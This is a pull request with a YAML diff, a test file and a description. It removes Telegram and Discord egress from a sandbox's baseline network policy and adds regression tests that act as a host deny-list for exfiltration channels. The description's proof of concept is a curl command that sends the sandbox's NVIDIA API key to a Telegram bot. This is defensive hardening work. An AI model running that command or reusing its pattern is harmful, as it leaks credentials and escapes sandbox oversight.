### PR TITLE
security: remove telegram and discord from baseline sandbox policy

### DIFF
--- a/nemoclaw-blueprint/policies/openclaw-sandbox.yaml
+++ b/nemoclaw-blueprint/policies/openclaw-sandbox.yaml
@@ -161,4 +161,5 @@ network_policies:
   # Telegram and Discord are NOT included in the baseline policy.
   # Any process in the sandbox can reach these endpoints when enabled,
   # making them data exfiltration channels (C-3). Users who need
-  # messaging can opt in: nemoclaw preset apply telegram|discord
+  # messaging can opt in via `nemoclaw onboard` (suggested presets) or
+  # by running `nemoclaw <sandbox> policy-add telegram|discord`.

--- a/nemoclaw-blueprint/policies/openclaw-sandbox.yaml
+++ b/nemoclaw-blueprint/policies/openclaw-sandbox.yaml
@@ -157,44 +157,8 @@ network_policies:
       - { path: /usr/local/bin/openclaw }
       - { path: /usr/local/bin/npm }
 
-  # ── Messaging — pre-allowed for agent notifications ────────────
-  # Telegram and Discord are open by default so the agent can send
-  # notifications and respond to chats without triggering approval.
-  telegram:
-    name: telegram
-    endpoints:
-      - host: api.telegram.org
-        port: 443
-        protocol: rest
-        enforcement: enforce
-        tls: terminate
-        rules:
-          - allow: { method: GET, path: "/bot*/**" }
-          - allow: { method: POST, path: "/bot*/**" }
-
-  discord:
-    name: discord
-    endpoints:
-      - host: discord.com
-        port: 443
-        protocol: rest
-        enforcement: enforce
-        tls: terminate
-        rules:
-          - allow: { method: GET, path: "/**" }
-          - allow: { method: POST, path: "/**" }
-      - host: gateway.discord.gg
-        port: 443
-        protocol: rest
-        enforcement: enforce
-        tls: terminate
-        rules:
-          - allow: { method: GET, path: "/**" }
-          - allow: { method: POST, path: "/**" }
-      - host: cdn.discordapp.com
-        port: 443
-        protocol: rest
-        enforcement: enforce
-        tls: terminate
-        rules:
-          - allow: { method: GET, path: "/**" }
+  # ── Messaging — opt-in only via presets ────────────────────────────
+  # Telegram and Discord are NOT included in the baseline policy.
+  # Any process in the sandbox can reach these endpoints when enabled,
+  # making them data exfiltration channels (C-3). Users who need
+  # messaging can opt in: nemoclaw preset apply telegram|discord

--- a/test/security-c3-baseline-messaging.test.js
+++ b/test/security-c3-baseline-messaging.test.js
@@ -1,0 +1,122 @@
+// SPDX-FileCopyrightText: Copyright (c) 2026 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+//
+// Security regression test: C-3 — Telegram and Discord must NOT appear
+// in the baseline sandbox policy.
+//
+// Messaging APIs are data exfiltration channels. Any process in the sandbox
+// can POST arbitrary data when these hosts are listed in the baseline without
+// a binaries: restriction. They must be opt-in only (via preset apply).
+
+"use strict";
+
+const { describe, it } = require("node:test");
+const assert = require("node:assert/strict");
+const fs = require("node:fs");
+const path = require("node:path");
+
+const BASELINE = path.join(
+  __dirname, "..", "nemoclaw-blueprint", "policies", "openclaw-sandbox.yaml",
+);
+const PRESETS_DIR = path.join(
+  __dirname, "..", "nemoclaw-blueprint", "policies", "presets",
+);
+
+// ═══════════════════════════════════════════════════════════════════
+// 1. Baseline must NOT contain messaging endpoints
+// ═══════════════════════════════════════════════════════════════════
+describe("C-3: baseline policy must not contain messaging exfiltration channels", () => {
+  it("api.telegram.org does not appear in baseline YAML", () => {
+    const yaml = fs.readFileSync(BASELINE, "utf-8");
+    assert.ok(
+      !yaml.includes("api.telegram.org"),
+      "api.telegram.org must not appear in baseline — use the telegram preset instead",
+    );
+  });
+
+  it("discord.com does not appear in baseline YAML", () => {
+    const yaml = fs.readFileSync(BASELINE, "utf-8");
+    assert.ok(
+      !yaml.includes("discord.com"),
+      "discord.com must not appear in baseline — use the discord preset instead",
+    );
+  });
+
+  it("gateway.discord.gg does not appear in baseline YAML", () => {
+    const yaml = fs.readFileSync(BASELINE, "utf-8");
+    assert.ok(
+      !yaml.includes("gateway.discord.gg"),
+      "gateway.discord.gg must not appear in baseline — use the discord preset instead",
+    );
+  });
+
+  it("cdn.discordapp.com does not appear in baseline YAML", () => {
+    const yaml = fs.readFileSync(BASELINE, "utf-8");
+    assert.ok(
+      !yaml.includes("cdn.discordapp.com"),
+      "cdn.discordapp.com must not appear in baseline — use the discord preset instead",
+    );
+  });
+
+  it("no baseline network_policies block lacks a binaries: restriction", () => {
+    const yaml = fs.readFileSync(BASELINE, "utf-8");
+    const lines = yaml.split("\n");
+    let inNetworkPolicies = false;
+    let currentBlock = null;
+    const blocks = [];
+
+    for (let i = 0; i < lines.length; i++) {
+      const line = lines[i];
+      if (/^network_policies:/.test(line)) { inNetworkPolicies = true; continue; }
+      if (inNetworkPolicies && /^\S/.test(line) && line.trim() !== "") {
+        if (currentBlock) blocks.push(currentBlock);
+        currentBlock = null;
+        inNetworkPolicies = false;
+        continue;
+      }
+      if (!inNetworkPolicies) continue;
+      if (/^  \w/.test(line) && line.trimEnd().endsWith(":")) {
+        if (currentBlock) blocks.push(currentBlock);
+        currentBlock = { name: line.trim().replace(/:$/, ""), startLine: i + 1, lines: [line] };
+        continue;
+      }
+      if (currentBlock) currentBlock.lines.push(line);
+    }
+    if (currentBlock) blocks.push(currentBlock);
+
+    assert.ok(blocks.length > 0, "baseline must have at least one network_policies block");
+
+    const violators = blocks.filter(
+      (b) => !b.lines.some((l) => /^\s+binaries:/.test(l)),
+    );
+
+    assert.deepEqual(
+      violators.map((b) => b.name),
+      [],
+      `Baseline blocks without binaries: restriction (any sandbox process can reach them):\n` +
+        violators.map((b) => `  - ${b.name} (line ${b.startLine})`).join("\n") +
+        `\nEither add binaries: or move to opt-in presets.`,
+    );
+  });
+});
+
+// ═══════════════════════════════════════════════════════════════════
+// 2. Opt-in presets must exist
+// ═══════════════════════════════════════════════════════════════════
+describe("C-3: messaging presets exist as opt-in path", () => {
+  it("telegram.yaml preset exists and contains api.telegram.org", () => {
+    const presetPath = path.join(PRESETS_DIR, "telegram.yaml");
+    assert.ok(fs.existsSync(presetPath), "telegram.yaml preset must exist");
+    const content = fs.readFileSync(presetPath, "utf-8");
+    assert.ok(content.includes("api.telegram.org"));
+    assert.ok(content.includes("network_policies:"));
+  });
+
+  it("discord.yaml preset exists and contains discord.com", () => {
+    const presetPath = path.join(PRESETS_DIR, "discord.yaml");
+    assert.ok(fs.existsSync(presetPath), "discord.yaml preset must exist");
+    const content = fs.readFileSync(presetPath, "utf-8");
+    assert.ok(content.includes("discord.com"));
+    assert.ok(content.includes("network_policies:"));
+  });
+});

--- a/test/security-c3-baseline-messaging.test.js
+++ b/test/security-c3-baseline-messaging.test.js
@@ -75,7 +75,7 @@ describe("C-3: baseline policy must not contain messaging exfiltration channels"
         continue;
       }
       if (!inNetworkPolicies) continue;
-      if (/^  \w/.test(line) && line.trimEnd().endsWith(":")) {
+      if (/^ {2}(?!#)\S.*:\s*$/.test(line)) {
         if (currentBlock) blocks.push(currentBlock);
         currentBlock = { name: line.trim().replace(/:$/, ""), startLine: i + 1, lines: [line] };
         continue;
@@ -108,15 +108,15 @@ describe("C-3: messaging presets exist as opt-in path", () => {
     const presetPath = path.join(PRESETS_DIR, "telegram.yaml");
     assert.ok(fs.existsSync(presetPath), "telegram.yaml preset must exist");
     const content = fs.readFileSync(presetPath, "utf-8");
-    assert.ok(content.includes("api.telegram.org"));
-    assert.ok(content.includes("network_policies:"));
+    assert.ok(content.includes("api.telegram.org"), "telegram.yaml must include api.telegram.org");
+    assert.ok(content.includes("network_policies:"), "telegram.yaml must include network_policies:");
   });
 
   it("discord.yaml preset exists and contains discord.com", () => {
     const presetPath = path.join(PRESETS_DIR, "discord.yaml");
     assert.ok(fs.existsSync(presetPath), "discord.yaml preset must exist");
     const content = fs.readFileSync(presetPath, "utf-8");
-    assert.ok(content.includes("discord.com"));
-    assert.ok(content.includes("network_policies:"));
+    assert.ok(content.includes("discord.com"), "discord.yaml must include discord.com");
+    assert.ok(content.includes("network_policies:"), "discord.yaml must include network_policies:");
   });
 });


### PR DESCRIPTION
## Summary

Telegram and Discord network policy blocks were always-on in the baseline sandbox policy with no `binaries:` restriction. Any process in the sandbox (curl, python3, node, etc.) could POST arbitrary data to attacker-controlled Telegram bots or Discord webhooks — an unconditional data exfiltration channel from every sandbox.

**PoC**: `curl -X POST "https://api.telegram.org/bot${TOKEN}/sendMessage" -d "text=${NVIDIA_API_KEY}"` succeeds from any sandbox process.

### Fix

Remove `telegram` and `discord` blocks from `openclaw-sandbox.yaml`. Both are already available as opt-in presets (`presets/telegram.yaml`, `presets/discord.yaml`) via `nemoclaw preset apply`.

### Changes

| File | Change |
|------|--------|
| `nemoclaw-blueprint/policies/openclaw-sandbox.yaml` | Remove telegram (lines 163-173) and discord (lines 175-201) blocks |
| `test/security-c3-baseline-messaging.test.js` | 7 tests: host deny-list, binaries invariant, preset existence |

## Test plan

- [x] 7 tests pass (`node --test test/security-c3-baseline-messaging.test.js`)
- [x] No messaging hosts in baseline YAML
- [x] Every remaining baseline block has `binaries:` restriction
- [x] Telegram and discord presets still exist for opt-in

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Security Updates**
  * Telegram and Discord egress removed from the baseline sandbox policy; messaging access must be explicitly enabled via opt-in presets.

* **Tests**
  * Added security regression tests that verify messaging hosts are absent from the baseline policy and that Telegram/Discord opt-in presets exist and include the expected entries.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->